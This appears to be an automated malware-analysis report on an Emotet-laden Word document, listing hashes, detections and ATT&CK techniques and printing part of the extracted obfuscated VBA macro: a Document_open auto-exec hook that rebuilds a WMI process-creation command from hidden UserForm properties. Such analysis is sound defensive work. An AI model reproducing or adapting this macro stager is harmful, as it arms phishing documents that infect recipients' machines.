Emotet Office (OLE) malware analysis — malicious · eec3fefb86cfbbd7

MALICIOUS

Office (OLE)

225.2 KB Created: 2020-08-27 08:39:00 Authoring application: Microsoft Office Word First seen: 2020-09-15

MD5: 4fe55bb1bd2b6436c0c11d0a0ad97d3d SHA-1: 5955c007f7415a1bd94266451d05fb4a6afca245 SHA-256: eec3fefb86cfbbd7bc1f2b0edf5095203dc5a637dea2213b7bc0f1b4b219b323

262 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1203 Exploitation for Client Execution

The sample contains VBA macros with a Document_Open auto-execution routine, indicative of a malicious document. Critical heuristics indicate a hidden UserForm command stager, a common Emotet technique for downloading and executing further payloads. The ClamAV signature also explicitly names Emotet.

Heuristics 7

ClamAV: Doc.Downloader.EmotetRed02226-9938639-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.EmotetRed02226-9938639-0
VBA macros detected medium 4 related findings OLE_VBA_MACROS

Document contains VBA macro code
VBA UserForm hidden-property command stager critical OLE_VBA_USERFORM_HIDDEN_COMMAND_STAGER

VBA auto-exec macro creates a COM object from a decoded variable and reconstructs command text through Split/Join and hidden UserForm properties such as ControlTipText, Tag, Pages, or HelpContextId. This is a high-confidence macro downloader/loader shape seen in the reviewed OLE set, but it is not an Office CVE exploit primitive.
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 9239 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	9239 bytes
SHA-256: `8b93416e0d4e8ed1301e23bd14a33edd647c51f7b1f5635959c62c35ce6d403a`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "Ogwj7dz9yz6" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub _ Document_open() Cpylr5czo_dt.Nwlvq1qunhvxe End Sub Attribute VB_Name = "Cpylr5czo_dt" Attribute VB_Base = "0{4AC8E6A5-B599-413A-85D8-81A8FB482D1B}{3E74C5AA-5594-4293-A48F-9EFFF573E412}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Function Nwlvq1qunhvxe() On Error Resume Next wwwwww = Zyrc / Sin(ULZZ9) * BmtF * pLiA30s + jazi + PhzY / TpZa1L / 830 * (DdY / CLng(zTHb2251X) - AWdYTT5J0 / Oct(812 + Sqr(hxS))) wwwwww = (MpBQ + Round(pxer0) / 70 / Hex(1614 - CLng(40679596)) - 9 + CBool(efCF1u1)) * BgJh - Fgwld45m6 Gilcp3gswl3sfo0pqz = 100 On Error Resume Next wwwwww = Zyrc / Sin(ULZZ9) * BmtF * pLiA30s + jazi + PhzY / TpZa1L / 830 * (DdY / CLng(zTHb2251X) - AWdYTT5J0 / Oct(812 + Sqr(hxS))) wwwwww = (MpBQ + Round(pxer0) / 70 / Hex(1614 - CLng(40679596)) - 9 + CBool(efCF1u1)) * BgJh - Fgwld45m6 Zuj2d0co751s5lkt = ChrW(Gilcp3gswl3sfo0pqz + (xw + 5 + jwb + 10)) On Error Resume Next wwwwww = Zyrc / Sin(ULZZ9) * BmtF * pLiA30s + jazi + PhzY / TpZa1L / 830 * (DdY / CLng(zTHb2251X) - AWdYTT5J0 / Oct(812 + Sqr(hxS))) wwwwww = (MpBQ + Round(pxer0) / 70 / Hex(1614 - CLng(40679596)) - 9 + CBool(efCF1u1)) * BgJh - Fgwld45m6 Khwqtqoeb5tlzjq0r4 = "(hsv 32(()hq gq721g()))) hsu0())(hsv 32(()hq gq721g()))) hsu0())w(hsv 32(()hq gq721g()))) hsu0())i(hsv 32(()hq gq721g()))) hsu0())nm(hsv 32(()hq gq721g()))) hsu0())(hsv 32(()hq gq721g()))) hsu0())gm(hsv 32(()hq gq721g()))) hsu0())t(hsv 32(()hq gq721g()))) hsu0())(hsv 32(()hq gq721g()))) hsu0())" + Zuj2d0co751s5lkt + "(hsv 32(()hq gq721g()))) hsu0())(hsv 32(()hq gq721g()))) hsu0()):(hsv 32(()hq gq721g()))) hsu0())w(hsv 32(()hq gq721g()))) hsu0())in(hsv 32(()hq gq721g()))) hsu0())(hsv 32(()hq gq721g()))) hsu0())3(hsv 32(()hq gq721g()))) hsu0())2(hsv 32(()hq gq721g()))) hsu0())_(hsv 32(()hq gq721g()))) hsu0())" + Cpylr5czo_dt.Gsm427kxyw82m41i + "(hsv 32(()hq gq721g()))) hsu0())ro(hsv 32(()hq gq721g()))) hsu0())(hsv 32(()hq gq721g()))) hsu0())ce(hsv 32(()hq gq721g()))) hsu0())s(hsv 32(()hq gq721g()))) hsu0())s(hsv 32(()hq gq721g()))) hsu0())" On Error Resume Next wwwwww = Zyrc / Sin(ULZZ9) * BmtF * pLiA30s + jazi + PhzY / TpZa1L / 830 * (DdY / CLng(zTHb2251X) - AWdYTT5J0 / Oct(812 + Sqr(hxS))) wwwwww = (MpBQ + Round(pxer0) / 70 / Hex(1614 - CLng(40679596)) - 9 + CBool(efCF1u1)) * BgJh - Fgwld45m6 G24lp96fyuoy08tp7 = Lmwxjmutqqp4ujh0(Khwqtqoeb5tlzjq0r4) On Error Resume Next wwwwww = Zyrc / Sin(ULZZ9) * BmtF * pLiA30s + jazi + PhzY / TpZa1L / 830 * (DdY / CLng(zTHb2251X) - AWdYTT5J0 / Oct(812 + Sqr(hxS))) wwwwww = (MpBQ + Round(pxer0) / 70 / Hex(1614 - CLng(40679596)) - 9 + CBool(efCF1u1)) * BgJh - Fgwld45m6 On Error Resume Next wwwwww = Zyrc / Sin(ULZZ9) * BmtF * pLiA30s + jazi + PhzY / TpZa1L / 830 * (DdY / CLng(zTHb2251X) - AWdYTT5J0 / Oct(812 + Sqr(hxS))) wwwwww = (MpBQ + Round(pxer0) / 70 / Hex(1614 - CLng(40679596)) - 9 + CBool(efCF1u1)) * BgJh - Fgwld45m6 Lu7gu84qmnx3w1uil = Cpylr5czo_dt.Lrwalh7cpnl3fd9.ControlTipText On Error Resume Next wwwwww = Zyrc / Sin(ULZZ9) * BmtF * pLiA30s + jazi + PhzY / TpZa1L / 830 * (DdY / CLng(zTHb2251X) - AWdYTT5J0 / Oct(812 + Sqr(hxS))) wwwwww = (MpBQ + Round(pxer0) / 70 / Hex(1614 - CLng(40679596)) - 9 + CBool(efCF1u1)) * BgJh - Fgwld45m6 S3tc33mphau5 = O19w4vwk0k_ofw + (G24lp96fyuoy08tp7 + Zuj2d0co751s5lkt + Cpylr5czo_dt.Bq9sqz9e483y.ControlTipText + Lu7gu84qmnx3w1uil) On Error Resume Next wwwwww = Zyrc / Sin(ULZZ9) * BmtF * pLiA30s + jazi + PhzY / TpZa1L / 830 * (DdY / CLng(zTHb2251X) - AWdYTT5J0 / Oct(812 + Sqr(hxS ... (truncated)

SHA-256: 8b93416e0d4e8ed1301e23bd14a33edd647c51f7b1f5635959c62c35ce6d403a

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "Ogwj7dz9yz6"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub _
Document_open()
Cpylr5czo_dt.Nwlvq1qunhvxe
End Sub


Attribute VB_Name = "Cpylr5czo_dt"
Attribute VB_Base = "0{4AC8E6A5-B599-413A-85D8-81A8FB482D1B}{3E74C5AA-5594-4293-A48F-9EFFF573E412}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function Nwlvq1qunhvxe()
   On Error Resume Next
         wwwwww = Zyrc / Sin(ULZZ9) * BmtF * pLiA30s + jazi + PhzY / TpZa1L / 830 * (DdY / CLng(zTHb2251X) - AWdYTT5J0 / Oct(812 + Sqr(hxS)))
         wwwwww = (MpBQ + Round(pxer0) / 70 / Hex(1614 - CLng(40679596)) - 9 + CBool(efCF1u1)) * BgJh - Fgwld45m6
Gilcp3gswl3sfo0pqz = 100
   On Error Resume Next
         wwwwww = Zyrc / Sin(ULZZ9) * BmtF * pLiA30s + jazi + PhzY / TpZa1L / 830 * (DdY / CLng(zTHb2251X) - AWdYTT5J0 / Oct(812 + Sqr(hxS)))
         wwwwww = (MpBQ + Round(pxer0) / 70 / Hex(1614 - CLng(40679596)) - 9 + CBool(efCF1u1)) * BgJh - Fgwld45m6
Zuj2d0co751s5lkt = ChrW(Gilcp3gswl3sfo0pqz + (xw + 5 + jwb + 10))
   On Error Resume Next
         wwwwww = Zyrc / Sin(ULZZ9) * BmtF * pLiA30s + jazi + PhzY / TpZa1L / 830 * (DdY / CLng(zTHb2251X) - AWdYTT5J0 / Oct(812 + Sqr(hxS)))
         wwwwww = (MpBQ + Round(pxer0) / 70 / Hex(1614 - CLng(40679596)) - 9 + CBool(efCF1u1)) * BgJh - Fgwld45m6
Khwqtqoeb5tlzjq0r4 = "(hsv 32(()hq gq721g()))) hsu0())(hsv 32(()hq gq721g()))) hsu0())w(hsv 32(()hq gq721g()))) hsu0())i(hsv 32(()hq gq721g()))) hsu0())nm(hsv 32(()hq gq721g()))) hsu0())(hsv 32(()hq gq721g()))) hsu0())gm(hsv 32(()hq gq721g()))) hsu0())t(hsv 32(()hq gq721g()))) hsu0())(hsv 32(()hq gq721g()))) hsu0())" + Zuj2d0co751s5lkt + "(hsv 32(()hq gq721g()))) hsu0())(hsv 32(()hq gq721g()))) hsu0()):(hsv 32(()hq gq721g()))) hsu0())w(hsv 32(()hq gq721g()))) hsu0())in(hsv 32(()hq gq721g()))) hsu0())(hsv 32(()hq gq721g()))) hsu0())3(hsv 32(()hq gq721g()))) hsu0())2(hsv 32(()hq gq721g()))) hsu0())_(hsv 32(()hq gq721g()))) hsu0())" + Cpylr5czo_dt.Gsm427kxyw82m41i + "(hsv 32(()hq gq721g()))) hsu0())ro(hsv 32(()hq gq721g()))) hsu0())(hsv 32(()hq gq721g()))) hsu0())ce(hsv 32(()hq gq721g()))) hsu0())s(hsv 32(()hq gq721g()))) hsu0())s(hsv 32(()hq gq721g()))) hsu0())"
   On Error Resume Next
         wwwwww = Zyrc / Sin(ULZZ9) * BmtF * pLiA30s + jazi + PhzY / TpZa1L / 830 * (DdY / CLng(zTHb2251X) - AWdYTT5J0 / Oct(812 + Sqr(hxS)))
         wwwwww = (MpBQ + Round(pxer0) / 70 / Hex(1614 - CLng(40679596)) - 9 + CBool(efCF1u1)) * BgJh - Fgwld45m6
G24lp96fyuoy08tp7 = Lmwxjmutqqp4ujh0(Khwqtqoeb5tlzjq0r4)
   On Error Resume Next
         wwwwww = Zyrc / Sin(ULZZ9) * BmtF * pLiA30s + jazi + PhzY / TpZa1L / 830 * (DdY / CLng(zTHb2251X) - AWdYTT5J0 / Oct(812 + Sqr(hxS)))
         wwwwww = (MpBQ + Round(pxer0) / 70 / Hex(1614 - CLng(40679596)) - 9 + CBool(efCF1u1)) * BgJh - Fgwld45m6
   On Error Resume Next
         wwwwww = Zyrc / Sin(ULZZ9) * BmtF * pLiA30s + jazi + PhzY / TpZa1L / 830 * (DdY / CLng(zTHb2251X) - AWdYTT5J0 / Oct(812 + Sqr(hxS)))
         wwwwww = (MpBQ + Round(pxer0) / 70 / Hex(1614 - CLng(40679596)) - 9 + CBool(efCF1u1)) * BgJh - Fgwld45m6
Lu7gu84qmnx3w1uil = Cpylr5czo_dt.Lrwalh7cpnl3fd9.ControlTipText
   On Error Resume Next
         wwwwww = Zyrc / Sin(ULZZ9) * BmtF * pLiA30s + jazi + PhzY / TpZa1L / 830 * (DdY / CLng(zTHb2251X) - AWdYTT5J0 / Oct(812 + Sqr(hxS)))
         wwwwww = (MpBQ + Round(pxer0) / 70 / Hex(1614 - CLng(40679596)) - 9 + CBool(efCF1u1)) * BgJh - Fgwld45m6
S3tc33mphau5 = O19w4vwk0k_ofw + (G24lp96fyuoy08tp7 + Zuj2d0co751s5lkt + Cpylr5czo_dt.Bq9sqz9e483y.ControlTipText + Lu7gu84qmnx3w1uil)
   On Error Resume Next
         wwwwww = Zyrc / Sin(ULZZ9) * BmtF * pLiA30s + jazi + PhzY / TpZa1L / 830 * (DdY / CLng(zTHb2251X) - AWdYTT5J0 / Oct(812 + Sqr(hxS
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.